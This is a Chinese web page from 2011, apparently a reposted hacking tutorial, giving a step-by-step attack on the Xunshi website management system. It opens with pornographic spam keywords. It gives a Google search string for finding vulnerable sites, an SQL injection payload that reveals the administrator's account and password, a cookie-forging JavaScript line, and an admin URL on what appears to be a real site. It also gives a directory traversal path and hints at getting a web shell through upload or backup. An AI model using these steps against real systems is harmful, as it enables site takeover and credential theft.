欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明

  發(fā)布時間:2011-07-15 15:13:06   作者:佚名   我要評論
訊時系統(tǒng)(xuas)最新通殺漏洞0day圖文說明,使用訊時網(wǎng)站管理系統(tǒng)的朋友可以參考下。

google關鍵字:inurl:news_more.asp?lm2= (關鍵字很多的自己定義吧)

1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下語句

2、有時1顯示錯誤信息的時候繼續(xù)往后退2,3,4,我退到11才找到了頁面,郁悶!

3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

爆出管理員帳號和密碼了

4、cookies進后臺

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

5、后臺用了cookie驗證,直接訪問http://www.dxggw.cn/admin/admin_index.asp就OK了!

6、后臺有上傳和備份取SHELL不難。

7、訊時還有個列目錄漏洞:http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..

逍遙復仇:我搞了一個訊時cms4.1版本的沒有數(shù)據(jù)庫備份不知道怎么搞SHELL,有的說雖然后臺顯示但備份頁面是存在的,登錄后臺后訪問 http://www.xx.com/admin/admin_db_backup.asp?action=BackupData,我這個沒有,郁悶著呢,誰還有其他辦法提供一下,謝謝!

相關文章

最新評論